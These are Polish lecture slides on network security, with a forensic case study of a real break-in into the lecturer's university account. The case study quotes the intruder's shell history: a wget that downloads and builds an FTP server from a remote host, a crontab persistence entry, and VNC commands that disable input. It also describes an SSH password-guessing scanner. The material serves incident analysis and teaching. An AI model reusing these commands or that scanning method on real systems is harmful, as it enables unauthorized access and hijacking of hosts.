BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH

Wielkość: px
Rozpocząć pokaz od strony:

Download "BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH"

Transkrypt

1 BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH Igor T. Podolak Instytut Informatyki UJ 8 październik 2008 IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

2 CO OBEJMUJE BEZPIECZEŃSTWO SIECI? bezpieczeństwo systemów operacyjnych bezpieczeństwo systemow plikowych i informacji zabezpieczenie dostępu do systemów uwierzytelnianie użytkowników i danych kryptografia i protokoły bezpieczeństwa uwierzytelnianie użytkowników funkcje haszujace i podpisy cyfrowe protokoły ustanawiania kluczy systemy zarzadzania kluczami dzielenie tajemnic i kryptografia grupowa systemy z wiedza zerowa kontrola dostępu i wykrywanie intruzów w systemie elektroniczny handel i elektroniczne pieniadze bezpieczne protokoły IP bezpieczeństwo oprogramowania IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

3 TYPY ATAKÓW wirusy kradzież sprzętu wewnętrzne naruszenie praw nieuprawniony dostęp odmowa dostępu do usług (DoS) wlamania do systemu nieuprawniony dostęp WiFi kradzież informacji przestępstwa finansowe naruszenia telekomunikacyjne złe użycie aplikacji webowych przestępstwa przeciw aplikacjom siecowym sabotaż IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

4 ATAKI WEDŁUG STRAT zawirusowanie nieuprawniony dostęp do informacji kradzież sprzętu mobilnego kradzież informacji odmowa usług DoS dostęp do poczty kradzież łacz telekomunikacyjnych zabronione wejście do systemu phishing zabroniony dostęp WiFi naruszenie instant messaging zle użycie aplikacji http sabotaż danych lub sieci naruszenie stron webowych podsłuchiwanie haseł ataki przeciw DNS IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

5 METODY OCHRONY zapory ogniowe (firewall) oprogramowanie antywirusowe oprogramowanie śledzace dostep kontrola dostępu do serwerów systemy detekcji włamań (IDS) kodowanie danych przy przesyłaniu kodowanie przechowywanych danych dostęp przez hasła zarzadzanie oprogramowaniem proxy i zapory na poziomie aplikacji karty i tokeny dostępu narzędzia śledzace struktura klucza publicznego PKI bezpieczność oprogramowania systemy biometryczne IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

6 METODY KONTROLI BEZPIECZEŃSTWA wewnetrzne audyty bezpieczeństwa testowanie możliwości włamania do systemu automatyczne narzędzia kontroli audyty bezpieczeństwa przez zewnętrzne firmy specjalistyczne śledzenie aktywności poczty śledzenie aktywności aplikacji webowych brak IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

7 TYPY ATAKÓW fizyczne podłuchiwanie włamania fizyczne wandalizm przez rozmowę podsłuchiwanie rozmów podsłuchiwanie komunikacji podawanie się za kogoś innego włamania skanowanie portów włamania do systemów denial of service wrogie oprogramowanie social engineering otwieranie załaczników kradzież informacji przeszukiwanie śmieci wyszukiwanie wrażliwych informacji w sieci IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

8 KIM SA ATAKUJACY? pracownicy wewnętrzni i współpracujacych frim script kiddies twórcy wirusów kryminaliści tylko testujacy systemy i informujacy o niedostatkach IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

9 ANALIZA RYZYKA identyfikacja i ocena zasobów identyfikacja możliwych zagrożeń ocena prawdopodobieństwa ataku wektor zagrożeń ŹRÓDŁA pracownicy, sprzataj acy, konkurencja, terroryści, pogoda, zatrudnieni z zewnatrz ZAGROŻENIA kradzież sprzętu i informacji, ujawnienie informacji, szpiegostwo, przestępstwa finansowe, DoS, utrata i zmiana danych, błędy ludzkie, problemy sprzetowe CELE sprzęt, miejsca przechowywania danych, systemy operacyjne, oprogramowanie, dokumentacja, dane, własność intelektualna, poczta komputerowa, telefony i faksy IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

10 MODELE BEZPIECZEŃSTWA LILLIPOP pojedyncza zapora wokoł zasobów system nie zabezpieczony po przekroczeniu ogrodzenia system nie ustala poziomów bezpieczeństwa nie zabezpiecza przed wewnętrznymi atakami CEBULKOWY szereg warstw określa kolejne poziomy bezpieczeństwa warstwy dostępu, identyfikacji, audytu, monitorowania, segmentacji, fizycznej ochrony STREFY ZAUFANIA podział w zależności od funkcjonalności różne poziomy zaufania wykorzystanie reguł zapór i list kontroli dostepu ACL IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

11 REGUŁY POLITYKI BEZPIECZEŃSTWA IDENTYFIKACJI konto/hasło, dwustopniowa identyfikacja, kontrola jakosci haseł SIECIOWE kontrola połaczeń wchodzacych, blokowanie nieuprawnionego dostępu, wirtualna sieć prywatna, OCHRONY DANYCH prawa własności, monitorowanie poczty, poziomy klasyfikacji, kodowanie danych wchodzacych i wychodzacych, śledzenie wymiany przez praconików, usuwanie dokumentów papierowych i elektronicznych, dostęp do danych serwerów, kontrola sieci wysokiego ryzyka SPOJNOŚCI DANYCH backup, aktualizacja oprogramowania ADMINISTRACJI SYSTEMEM monitorowanie aplikacji i systemów WYKORZYSTANIA SYSTEMU reguły użycia przez pracownikow, prywatne użycie systemu KONTROLI BEZPIECZENSTWA tajność prac w systemie, audyty DOSTEPU FIZYCZNEGO zależność od funkcji, uwierzytelnianie dostępu IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

12 ANATOMIA ATAKU rekonesans social engineering fizyczny rekonesans atakowanego rekonesans sieci/ip, rekonesans www rozpoznanie DNS wyszukiwanie celów war dialing rozpoznanie struktury atakowanego systemu skanowanie portów rozpoznanie i testowanie słabych punktów penetracja systemu łamanie haseł ataki na aplikacje penetracja c.d. włamania do systemu plikowego umieszczenie wrogiego kodu manipulacja procesami łamanie procesów powłok przejmowanie sesji spoofing przejmowanie ruchu w sieci wykorzystanie relacji zaufania denial of service systemowe i sieciowe korzystanie rozszerzenie ataku na inne składniki sieci umieszczanie trojanów, backdoor, rootkit ochrona przed wykryciem IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

13 SOCIAL ENGINEERING I REKONESANS NA MIEJSCU hasło i informacja o koncie papierowe notatki, śmieci, przenośne nośniki danych listy adresów , informacje z systemu informacyjengo numery telefoniczne notatki papierowe, informacje od usług informacyjnych pozwala na ataki social engineering, także war dialing rozpoznanie i mapa systemu: numery IP, nazwy serwerów, usługi, aplikacje, architektura notatki, przenośne nośniki, dokumentacja systemu, kradzież social engineering, narzędzia inne narzędzia wyszukiwarki (także narzędzia finansowe Securities Comission ( NASDAQ ( NY Stock Exchange ( ksiażki telefoniczne ( IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

14 REKONESANS IP najpierw konieczne wykrycie prawdopodobnych nazw domen w standardowych spisch wykrycie właścicieli domen w systemach rejestrujacych wyszukiwanie wszystkich domen posiadanych przez organizację whois ICANN dla domen.com,.net,.org dla innych inne serwery whois USA: Europa: domeny.com,.org,.net,.edu: inne narzędzia whois is usługa powinna działać na porcie 43, obecnie głównie przez http IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

15 REKONESANS DNS standardowe zapytanie DNS może dać sporo informacji narzędzia nslookup i dig serwery nazw dig uj.edu.pl ns adresy IP dig ii.uj.edu.pl a serwer poczty dig ii.uj.edu.pl mx informacje o hostach dig uj.edu.pl info inne serwery host IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

16 MAPOWANIE SIECI I ADRESÓW IP wykrycie topologii sieci, nazw, usług celem jest wykrycie ewentualnych słabych punktów zwykle skaner ping/tcp:fping ( Nmap ( ICMP ping jest typowo blokowany przez administratorów skanowanie TCP skanowanie portów / systemu operacyjnego / oprogramowania / słabości skanowanie słabości Nessus SARA (www-arc.com/sara), SATAN ( zen/satan/satan.html IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

17 WŁAMANIE zauważyłem w historii swojego komputera ul.ii.uj.edu.pl 960 uptime 961 df -h 962 pwd 963 ps x 964 mkdir.init 965 cd.init 966 wget ftp://happy:scanning@ :55955/ftpd 967 tar zxf ftpd tar.gz 968 rm ftpd tar.gz 969 mv ftp4all/*. 970 rmdir ftp4all 971./configure czy to było włamanie??? IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

18 WŁAMANIE ściagnięty serwer ftp ftp4all, kompilacja instalacja do specjalnie zalożonej kartoteki.init w mojej kartotece domowej skopiowane wszystkie pliki z.init/bin do.init/standard/sbin, nastepnie przekopiowal standard/sbin do sbin zmiana nazwy wykonywalnego pliku na xvmr - czy z czymś się kojarzy? podkartoteka ze źródłami wymazana, jednak ftp4all jest do ściagnięcia i można powtórzyć prawdopodbne operacje w etc/ftpd.reg ustawione sa adminport numer portu obsługi dla administratora ftp port 5902 w /home/igor/.init/f numer portu gdzie serwer jest dostępny 5902 to jeden z portow wykorzystywanych przez Xvnc otwarty na komputerze włamywacz musiał wcześniej skanować porty IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

19 WŁAMANIE W plikach msg/goodbye, msg/welcome, i msg/startup szereg zabawnych komunikatów: msg/startup: FTP server ready. Preceeding... msg/welcome: Welcome, 2 Another Great Server BY, -=FLOTILLA=msg/goodbye: GOOdBye, Hope 2 See U Again SOON...(= zabawne, prawda? IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

20 CRONTAB edycja mojej lokalnej tablicy cron, polegajaca na stałym uruchamianiu pliku xvmr, patrz lokalna tablica crontab: * * * * /home/igor/.init/sbin/xvmr a więc co minutę. poprawka naniesiona była 2 sierpnia o 19:45; to lokalizuje datę włamania IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

21 SKAD TO WŁAMANIE? W pliku /var/log/secure, pomiędzy wieloma nieudanymi, jest niepokojacy wpis, powtarzajacy się wiele razy August 2: 15:51:26: Address maps to sip this does not map back to the address - POSSIBLE BR po wykorzystaniu odwrotnego mapowania dig -x dostajemy nazwę sip.bernaunet.de, jednak mapowanie wprost dig sip.bernaunet.de zwraca adres , stad to ostrzeżenie. poszukiwanie przez WWW adresu daje stronę firmy Wikom Elektrik GmbH włamywacz uruchamia swój program z wielu miejsc na świecie (albo jest ich wielu), gdzie włamał sie juz wcześniej nie wiadomo wciaż jaki jest oryginalny adres wlamywacza IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

22 XVNC last -f./wtmp nie pokazuje żadnego logowanie w okolicach feralnych modyfikacji ale wykorzystał dla ftp port 5902, a więc port Xvnc, a serwer Xvnc był uruchomiony, a także klient Xvnc dostał sie pewnie przez zalogowanie do otwartego wtedy połaczenia Xvnc ekran klienta Xvnc po ponownym połaczeniu z serwerem jest czarny i nic nie pomaga w jego uaktywnieniu, a serwer Xvnc na pewno dziala Czy Xvnc zapisuje gdzieś ślady dostępu??? ostatnie polecenie włamywacza to 1000 vncconfig -set AcceptpointerEvents=0 ; vncconfig -set AcceptkeyEvents=0 ; exit w której zmienia ustawienia konfiguracji vnc! Oto znaczenia zmienionych parametrów Xvnc AcceptPointerEvents: Accept pointer press and relea clients (default is on). tu włamywacz wyłaczył dzialanie myszki (pointer) IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

23 A CO JEST W ŚRODKU? W kartotece.init/f sa bardzo dziwne pliki: drwxrwxr-x 5 igor igor 4096 Aug 2 19:51. drwxrwxr-x 11 igor igor 4096 Aug 2 19:41.. drwx igor igor 4096 Aug 2 19:48???? 100MBiT.PL 10GB??? drwx igor igor 4096 Aug 2 19:48???? Dupe-FxP???? drwx igor igor 4096 Aug 2 FLOTILLA? -rw igor igor 48 Aug 2 19:49.permissions Pliki.permissions w podkartotekach sa identyczne, jednak różne od tego w glownej podkartotece f w historii włamania jest polecenie utworzenia podkartoteki f, jednak nie sa utworzone żadne dalsze podkartoteki czy same pliki.permissions wyglada na to, że włamywacz utworzył sam serwer ftpd IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

24 połaczenie z serwerem następuje przez ftp ul 5902 połaczenie z portem administracji nie powodzi się (telnet ul 60283) włamywacz albo źle zainstalowal serwer albo nie miał zamiaru nim administrować IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

25 BŁEDY WŁAMYWACZA nie wyczyscił historii poleceń uruchomiony proces /home/igor/.init/xvmr wyświetla się w liście procesów ps -aux grep igor nie usunał wielu zbędnych już plikow z kartoteki.init, a usunał pliki źródłowe nie zadbał o to, by crontab nie wysyłał co chwilę maila o uruchomieniu serwera, np. From igor@ul.ii.uj.edu.pl Mon Aug 7 11:01: Date: Mon, 7 Aug :01: From: root@ul.ii.uj.edu.pl (Cron Daemon) To: igor@ul.ii.uj.edu.pl Subject: Cron <igor@ul> /home/igor/.init/sbin/xvmr X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/home/igor> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=igor> X-Cron-Env: <USER=igor> IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

26 CO ROBIĆ? wykasować kartotekę serwera ftpd, usunać wpis z tablicy crontab poczekać na połaczenie by wykryć włamywacza zmienić hasło uzytkownika igor sprawdzić tego użytkownika na innych komputerach ustawić blokadę dostępu do połaczeń tcp wykorzystujac tcp_wrappers sprawdzić adres użytkownika, ktory odgadł haslo IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

27 PROSTY SKRYPT uruchomiłem prosty skrypt #!/usr/bin/perl open(logfile, ">>slad.txt"); while(true) { \$s = netstat --tcp grep \"ul.ii.uj.edu.pl:590 if(length(\$s) > 0) { \$d = date ; chomp \$d; chomp \$s; print LOGFILE "\$d:\n\$s\n"; \$s = ""; } \$p = sleep 60; } majacy wyłapac wszelkich potencjalnych "klientów" serwera, w domyśle włamywacza, bo któż inny może o założonym serwerze wiedziec? IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

28 KTOŚ KORZYSTA! po kilku dniach plik śladu (ślad.txt) troche sie zapełnił: wlamanie]$ cat slad.txt Fri Aug 4 12:30:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 E Fri Aug 4 12:31:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 E Fri Aug 4 12:32:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 F Sun Aug 6 10:39:32 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 E Sun Aug 6 10:40:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 E Sun Aug 6 10:41:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 E Sun Aug 6 10:42:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 E Sun Aug 6 10:43:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 E Sun Aug 6 10:44:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 E Sun Aug 6 10:45:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 E Sun Aug 6 10:46:34 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 E Sun Aug 6 10:47:34 CEST 2006: IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

29 ALE CO Z TEGO? listing kartoteki.init/f (a wiec korzenia nowego serwera ftp) daje [igor@ul f]$ ll total 32 drwx igor 4096 Aug 2 19:48???? 100MBiT.PL 10GB LINUX???? drwx igor 4096 Aug 2 19:48???? Dupe-FxP???? drwx igor 4096 Aug 2 drwx igor 4096 Aug 6 10:45 Spikes.Women.of.Action.2006.WS.PDTV.X igor@ul Spikes.Women.of.Action.2006.WS.PDTV.XviD-PAP]$ l więc, nowy użytkownik załozył nowa kartoteka Spikes.Women.of.Action w której jest trochę nowych plików: total rw igor 6518 Aug 6 10:39 PAP-Spikes.Women. -rw igor Aug 6 10:39 PAP-swoa.r00 -rw igor Aug 6 10:39 PAP-swoa.r01 -rw igor Aug 6 10:40 PAP-swoa.r02 -rw igor Aug 6 10:40 PAP-swoa.r03 -rw igor Aug 6 10:40 PAP-swoa.r04 IGOR T. PODOLAK -rw (INSTYTUT INFORMATYKI igor UJ) BEZPIECZEŃSTWO SIECIAug KOMPUTEROWYCH 6 10:40 PAP-swoa.r05 8 PAŹDZIERNIK / 35

30 I CO JESZCZE? a w kartotece.init/f/sample jest plik -rw igor igor Aug 6 10:39 Spikes razem wiec ok. 350 MB. to po prostu aktywne kobiety, dobrej jakości filmy istnieje coś takiego jak WOA Women of Action Network dig ujawnia domenę reardenstudios.com i serwer homer.reardenstudios.com ( czyżby chcieli ułatwić sobie przekaz? IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

31 SPRZATANIE skasowany server vnc zmiana hasła użytkownika igor list do z ostrzeżeniem, gdyż jeden z ataków byl przeprowadzony z adresu , ktory mapował się na sip.bernaunet.de a ten na nawww.bernaunet.de, a to była firma Wikom Elektrik GmbH w Bernie odpowiedź w bardzo szybkim tempie (mniej niż 20 minut) z info@ocsb.de: we have taken the affected machine of the net and have exchanged for another. We will analyze the log files and refund announcement against the suitable person. We apologise for your incommodities and can assure you from this server no more attack will go out. MfG bernaunet.de w odpowiedzi na pytanie o szczegoły następujaca odpowiedź a user s account ran obviously whole thus of the hackers has cracked. Then a Kernelbug must have been used with the help of the IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

32 CO ROBIŁ WŁAMYWACZ? loguje sie kolejno na kontach sven i potem mtvs sciaga linux3.tgz (w kartotece linux3) z members.lycos.co.uk/neneax/linux3.tgz, rozpakowuje go do kartoteki.m to jest open source irc bot written in C - patrz ściaga z tego samego adresu scanx.tgz rozpakowujac do kartoteki chyba.de (niemiecka domena - firma jest w bernie, ale w niemieckiej domenie) ściaga tez plik de, ktory jest słownikiem niemieckich imion i innych prawdopodobnych nazw użytkowników uruchamia wtedy.de/x (przykładowa nazwa domeny) ten jest skryptem uruchamiajacym.de/scan $1 22, czyli./de scan , a 22 to numer portu ssh - innymi słowy wyszukiwanie serwerów domenie wykorzystujacych ssh, zapisujac ja w pliku uniq.txt IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

33 CO ROBIŁ WŁAMYWACZ? zbiera listę serwerów i uruchamia.de/xpl 100 german, a więc zapewne po 100 prób na każdym z serwerow xpl próbuje się jednocześnie połaczyc z wieloma serwerami z listy z uniq.txt na każdym próbujac tego samego użytkownika, i zapewne, to samo hasło W ten sposob wielokrotnie przyspiesza działania - mimo, że każda próba logowania trwa ok. 3 sekund, to próbujac kilkaset serwerow jednocześnie dostajemy przyspieszenie a gdzie wyniki? chyba sa online??? bo to GOT...??? albo tez sa zapisywane w pliku vuln.txt xpl jest bardzo podobne do ssh to jakaż przeróbka IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

34 CO ROBIŁ WŁAMYWACZ? strings xpl pokazuje między innymi %sgot IT!! -> %s:%s:%s jest to więc jakieś wypisanie wyniku, tak jak wyżej jest GOT IT./x > billing:habl99: ale nie jest nigdy ten plik ogladany na koncu wlamywacz oglada plik vuln.txt i później (razem z log.txt, status, i uniq.txt) usuwa go mimo przyspieszenia byłoby dobrze, gdyby włamywacz nie musiał kontrolować działania bezpośrednio i wyniki logowania były wysyłane co jakiś czas dla ulatwienia IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

35 LITERATURA J. Pieprzyk, T. Harjano, J. Seberry, Teoria bezpieczeństwa systemów komputerowych, Springer/Helion N. Ferguson, B. Schneier, Kryptografia w praktyce, Helion B. Schneier, Kryptografia dla praktyków, Wiley / WNT D. Denning, Wojna informacyjna i bezpieczeństwo informacji, ACM/WNT A. Menezes, P. Van Oorschot, S. Vanstone, Handbook of applied Cryptography, CRC ( J. Viega, M. Messier, C i C++ bezpieczne programowanie: receptury, O Reilly/Helion S. Oaks, Java a bazpieczeństwo, O Reilly/RM C. Peikari, A. Chuvakian, Strażnik bezpieczeństwa danych, O Reilly/Helion IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK / 35

Wykład 1. komputerowych Pojęcia podstawowe główne slajdy. 5 października 2011. Igor T. Podolak Instytut Informatyki Uniwersytet Jagielloński

Wykład 1. komputerowych Pojęcia podstawowe główne slajdy. 5 października 2011. Igor T. Podolak Instytut Informatyki Uniwersytet Jagielloński Wykład 1 Pojęcia podstawowe główne slajdy 5 października 2011 polityka Instytut Informatyki Uniwersytet Jagielloński 1.1 Co obejmuje bezpieczeństwo sieci? bezpieczeństwo operacyjnych bezpieczeństwo plikowych

Bardziej szczegółowo

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci N, Wykład 6: Bezpieczeństwo w sieci 1 Ochrona danych Ochrona danych w sieci musi zapewniać: Poufność nieupoważnione osoby nie mają dostępu do danych Uwierzytelnianie gwarancja pochodzenia Nienaruszalność

Bardziej szczegółowo

Podstawy bezpieczeństwa

Podstawy bezpieczeństwa Podstawy bezpieczeństwa sieciowego Dariusz CHAŁADYNIAK 2 Plan prezentacji Złośliwe oprogramowanie Wybrane ataki na sieci teleinformatyczne Wybrane metody bezpieczeństwa sieciowego Systemy wykrywania intruzów

Bardziej szczegółowo

Znak sprawy: KZp

Znak sprawy: KZp Załącznik nr 2 do SIWZ OPIS PRZEDMIOTU ZAMÓWIENIA Przedmiotem zamówienia jest przedłużenie aktualizacji i wsparcia technicznego dla systemu antywirusowego - 195 licencji. Lp. Parametr Nazwa 1 aktualizowanego

Bardziej szczegółowo

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne

Bardziej szczegółowo

Metody ataków sieciowych

Metody ataków sieciowych Metody ataków sieciowych Podstawowy podział ataków sieciowych: Ataki pasywne Ataki aktywne Ataki pasywne (passive attacks) Polegają na śledzeniu oraz podsłuchiwaniu w celu pozyskiwania informacji lub dokonania

Bardziej szczegółowo

BEZPIECZEŃSTWO W SIECIACH

BEZPIECZEŃSTWO W SIECIACH PREZENTACJA NA SYSTEMY OPERACYJNE Katarzyna Macioszek styczeń 2007 DEFINICJA ROBAKA CO TO JEST ROBAK? PRZYKŁADY ROBAKÓW Robak - program komputerowy zdolny do samoreplikacji przez sieć bez interakcji użytkownika

Bardziej szczegółowo

Instrukcja konfiguracji funkcji skanowania

Instrukcja konfiguracji funkcji skanowania Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji

Bardziej szczegółowo

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych

Wykład 2: Budowanie sieci lokalnych. A. Kisiel, Budowanie sieci lokalnych Wykład 2: Budowanie sieci lokalnych 1 Budowanie sieci lokalnych Technologie istotne z punktu widzenia konfiguracji i testowania poprawnego działania sieci lokalnej: Protokół ICMP i narzędzia go wykorzystujące

Bardziej szczegółowo

4. Podstawowa konfiguracja

4. Podstawowa konfiguracja 4. Podstawowa konfiguracja Po pierwszym zalogowaniu się do urządzenia należy zweryfikować poprawność licencji. Można to zrobić na jednym z widżetów panelu kontrolnego. Wstępną konfigurację można podzielić

Bardziej szczegółowo

Poziomy wymagań Konieczny K Podstawowy- P Rozszerzający- R Dopełniający- D Uczeń: - zna rodzaje sieci - zna topologie sieciowe sieci

Poziomy wymagań Konieczny K Podstawowy- P Rozszerzający- R Dopełniający- D Uczeń: - zna rodzaje sieci - zna topologie sieciowe sieci WYMAGANIA EDUKACYJNE PRZEDMIOT: Administracja sieciowymi systemami operacyjnymi NUMER PROGRAMU NAUCZANIA (ZAKRES): 351203 1. Lp Dział programu Sieci komputerowe Poziomy wymagań Konieczny K Podstawowy-

Bardziej szczegółowo

ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ

ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 1 do Część II SIWZ SPIS

Bardziej szczegółowo

Księgarnia PWN: Greg Bastien, Christian Abera Degu Ściany ogniowe Cisco PIX

Księgarnia PWN: Greg Bastien, Christian Abera Degu Ściany ogniowe Cisco PIX Księgarnia PWN: Greg Bastien, Christian Abera Degu Ściany ogniowe Cisco PIX Wprowadzenie 17 Rozdział 1. Bezpieczeństwo sieci 27 Słabe punkty 27 Typy ataków 28 Ataki rozpoznawcze 29 Ataki dostępu 29 Ataki

Bardziej szczegółowo

ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ

ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 3 do Część II SIWZ Wymagania

Bardziej szczegółowo

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Krzysztof Młynarski (krzysztof.mlynarski@teleinformatica.com.pl) Teleinformatica Pomimo występowania bardzo wielu

Bardziej szczegółowo

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne Jarosław Kuchta Internetowe Usługi Informacyjne Komponenty IIS HTTP.SYS serwer HTTP zarządzanie połączeniami TCP/IP buforowanie odpowiedzi obsługa QoS (Quality of Service) obsługa plików dziennika IIS

Bardziej szczegółowo

Serwer SSH. Wprowadzenie do serwera SSH Instalacja i konfiguracja Zarządzanie kluczami

